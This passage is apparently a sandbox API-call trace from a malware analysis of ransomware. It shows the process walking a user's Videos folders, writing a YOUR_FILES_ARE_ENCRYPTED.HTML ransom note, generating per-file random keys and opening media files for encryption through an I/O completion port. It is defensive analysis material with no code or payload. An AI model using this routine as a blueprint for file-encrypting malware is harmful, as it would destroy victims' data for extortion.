Size=0x28150) returned 0x77a92b8 [0168.912] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="10") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="4A") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C3") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="95") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C9") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="33") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0E") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="93") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0A") returned 2 [0168.912] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1C") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CB") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D3") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F9") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="98") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="65") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F1") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="46") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="21") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AC") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BB") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="89") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="9B") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="96") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FB") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="51") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="3C") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="2E") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3B") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="85") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="27") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A3") returned 2 [0168.913] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0A") returned 2 [0168.914] lstrcpyW (in: lpString1=0x77b936c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4" [0168.914] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x77a92b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.914] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77a92b8, lpOverlapped=0x77a92b8) returned 1 [0168.914] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedfa3b30, ftCreationTime.dwHighDateTime=0x1d7ddfe, ftLastAccessTime.dwLowDateTime=0x63d5cdd0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x63d5cdd0, ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x6cc, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="TgNXZNShVhPaImwZH9B.mp4", cAlternateFileName="TGNXZN~1.MP4")) returned 0 [0168.914] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.914] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0168.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\llqhi_l iusbmama\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0168.915] WriteFile (in: hFile=0x5d8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.917] CloseHandle (hObject=0x5d8) returned 1 [0168.917] GetProcessHeap () returned 0x270000 [0168.918] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.919] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b893f0, ftCreationTime.dwHighDateTime=0x1d7d90d, ftLastAccessTime.dwLowDateTime=0xbdf76930, ftLastAccessTime.dwHighDateTime=0x1d7e425, ftLastWriteTime.dwLowDateTime=0xbdf76930, ftLastWriteTime.dwHighDateTime=0x1d7e425, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="riUpXrt01pZMn5 8ov6f", cAlternateFileName="RIUPXR~1")) returned 1 [0168.919] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f") returned 51 [0168.919] GetProcessHeap () returned 0x270000 [0168.919] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.919] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f" [0168.919] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\*" [0168.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b893f0, ftCreationTime.dwHighDateTime=0x1d7d90d, ftLastAccessTime.dwLowDateTime=0xbdf76930, ftLastAccessTime.dwHighDateTime=0x1d7e425, ftLastWriteTime.dwLowDateTime=0xbdf76930, ftLastWriteTime.dwHighDateTime=0x1d7e425, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.919] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b893f0, ftCreationTime.dwHighDateTime=0x1d7d90d, ftLastAccessTime.dwLowDateTime=0xbdf76930, ftLastAccessTime.dwHighDateTime=0x1d7e425, ftLastWriteTime.dwLowDateTime=0xbdf76930, ftLastWriteTime.dwHighDateTime=0x1d7e425, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.919] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6705a5a0, ftCreationTime.dwHighDateTime=0x1d7d8e6, ftLastAccessTime.dwLowDateTime=0xef9069e0, ftLastAccessTime.dwHighDateTime=0x1d7e193, ftLastWriteTime.dwLowDateTime=0xef9069e0, ftLastWriteTime.dwHighDateTime=0x1d7e193, nFileSizeHigh=0x0, nFileSizeLow=0xde24, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="DHGE9x qjE8n.mkv", cAlternateFileName="DHGE9X~1.MKV")) returned 1 [0168.919] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\DHGE9x qjE8n.mkv") returned 68 [0168.919] lstrcmpW (lpString1="DHGE9x qjE8n.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.919] PathFindExtensionW (pszPath="DHGE9x qjE8n.mkv") returned=".mkv" [0168.919] lstrlenW (lpString=".mkv") returned 4 [0168.919] PathFindExtensionW (pszPath="DHGE9x qjE8n.mkv") returned=".mkv" [0168.919] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0879fe0, ftCreationTime.dwHighDateTime=0x1d7da33, ftLastAccessTime.dwLowDateTime=0x3cc08930, ftLastAccessTime.dwHighDateTime=0x1d7e224, ftLastWriteTime.dwLowDateTime=0x3cc08930, ftLastWriteTime.dwHighDateTime=0x1d7e224, nFileSizeHigh=0x0, nFileSizeLow=0xbb57, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="lVhqKKlYkclHgttF.flv", cAlternateFileName="LVHQKK~1.FLV")) returned 1 [0168.919] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv") returned 72 [0168.919] lstrcmpW (lpString1="lVhqKKlYkclHgttF.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.919] PathFindExtensionW (pszPath="lVhqKKlYkclHgttF.flv") returned=".flv" [0168.919] lstrlenW (lpString=".flv") returned 4 [0168.919] PathFindExtensionW (pszPath="lVhqKKlYkclHgttF.flv") returned=".flv" [0168.920] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\lvhqkklykclhgttf.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0168.920] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=47959) returned 1 [0168.920] GetProcessHeap () returned 0x270000 [0168.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77d1410 [0168.924] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="3B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="1D") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="37") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="04") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9E") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="06") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="56") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="97") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="7E") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="AE") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="76") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8E") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="95") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FC") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="10") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="13") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="9B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="7B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="1B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BD") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="12") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="F6") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="97") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="22") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="91") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="45") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="94") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E6") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7B") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="FD") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="AD") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1C") returned 2 [0168.925] lstrcpyW (in: lpString1=0x77e14c4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv" [0168.925] CreateIoCompletionPort (FileHandle=0x5c0, ExistingCompletionPort=0x3a0, CompletionKey=0x77d1410, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.925] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77d1410, lpOverlapped=0x77d1410) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66fddd50, ftCreationTime.dwHighDateTime=0x1d7e6a3, ftLastAccessTime.dwLowDateTime=0xb3eeaf80, ftLastAccessTime.dwHighDateTime=0x1d7e6cc, ftLastWriteTime.dwLowDateTime=0xb3eeaf80, ftLastWriteTime.dwHighDateTime=0x1d7e6cc, nFileSizeHigh=0x0, nFileSizeLow=0xf786, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="TYyY-0of37OCQ.mp4", cAlternateFileName="TYYY-0~1.MP4")) returned 1 [0168.925] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4") returned 69 [0168.925] lstrcmpW (lpString1="TYyY-0of37OCQ.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.925] PathFindExtensionW (pszPath="TYyY-0of37OCQ.mp4") returned=".mp4" [0168.926] lstrlenW (lpString=".mp4") returned 4 [0168.926] PathFindExtensionW (pszPath="TYyY-0of37OCQ.mp4") returned=".mp4" [0168.926] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\tyyy-0of37ocq.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0168.926] GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=63366) returned 1 [0168.926] GetProcessHeap () returned 0x270000 [0168.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77f9568 [0168.930] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AA") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="94") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E9") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C7") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AD") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="2B") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="D8") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6F") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B6") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CD") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="5E") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="43") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0E") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="55") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="63") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="34") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9A") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FD") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="03") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="15") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AE") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="70") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="22") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2D") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="27") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E7") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="AF") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="32") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="89") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5D") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="68") returned 2 [0168.931] lstrcpyW (in: lpString1=0x780961c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4" [0168.931] CreateIoCompletionPort (FileHandle=0x5bc, ExistingCompletionPort=0x3a0, CompletionKey=0x77f9568, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.932] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77f9568, lpOverlapped=0x77f9568) returned 1 [0168.932] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdcc98c0, ftCreationTime.dwHighDateTime=0x1d7d829, ftLastAccessTime.dwLowDateTime=0xd4d80cf0, ftLastAccessTime.dwHighDateTime=0x1d7d957, ftLastWriteTime.dwLowDateTime=0xd4d80cf0, ftLastWriteTime.dwHighDateTime=0x1d7d957, nFileSizeHigh=0x0, nFileSizeLow=0xdbb8, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="vU_u1zc3_cCZF.swf", cAlternateFileName="VU_U1Z~1.SWF")) returned 1 [0168.932] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\vU_u1zc3_cCZF.swf") returned 69 [0168.932] lstrcmpW (lpString1="vU_u1zc3_cCZF.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.932] PathFindExtensionW (pszPath="vU_u1zc3_cCZF.swf") returned=".swf" [0168.932] lstrlenW (lpString=".swf") returned 4 [0168.932] PathFindExtensionW (pszPath="vU_u1zc3_cCZF.swf") returned=".swf" [0168.932] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad52f430, ftCreationTime.dwHighDateTime=0x1d7e3f0, ftLastAccessTime.dwLowDateTime=0xe7a72140, ftLastAccessTime.dwHighDateTime=0x1d7e49c, ftLastWriteTime.dwLowDateTime=0xe7a72140, ftLastWriteTime.dwHighDateTime=0x1d7e49c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="Wxr2rtTDs HM", cAlternateFileName="WXR2RT~1")) returned 1 [0168.932] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM") returned 65 [0168.932] GetProcessHeap () returned 0x270000 [0168.932] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x749a470 [0168.932] lstrcpyW (in: lpString1=0x749a470, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM" [0168.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\*" [0168.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad52f430, ftCreationTime.dwHighDateTime=0x1d7e3f0, ftLastAccessTime.dwLowDateTime=0xe7a72140, ftLastAccessTime.dwHighDateTime=0x1d7e49c, ftLastWriteTime.dwLowDateTime=0xe7a72140, ftLastWriteTime.dwHighDateTime=0x1d7e49c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0168.932] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad52f430, ftCreationTime.dwHighDateTime=0x1d7e3f0, ftLastAccessTime.dwLowDateTime=0xe7a72140, ftLastAccessTime.dwHighDateTime=0x1d7e49c, ftLastWriteTime.dwLowDateTime=0xe7a72140, ftLastWriteTime.dwHighDateTime=0x1d7e49c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.932] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff4dc8c0, ftCreationTime.dwHighDateTime=0x1d7d78c, ftLastAccessTime.dwLowDateTime=0xf5f30670, ftLastAccessTime.dwHighDateTime=0x1d7d87f, ftLastWriteTime.dwLowDateTime=0xf5f30670, ftLastWriteTime.dwHighDateTime=0x1d7d87f, nFileSizeHigh=0x0, nFileSizeLow=0x1344f, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="GE0jLnj.avi", cAlternateFileName="")) returned 1 [0168.932] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi") returned 77 [0168.932] lstrcmpW (lpString1="GE0jLnj.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.932] PathFindExtensionW (pszPath="GE0jLnj.avi") returned=".avi" [0168.932] lstrlenW (lpString=".avi") returned 4 [0168.932] PathFindExtensionW (pszPath="GE0jLnj.avi") returned=".avi" [0168.933] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 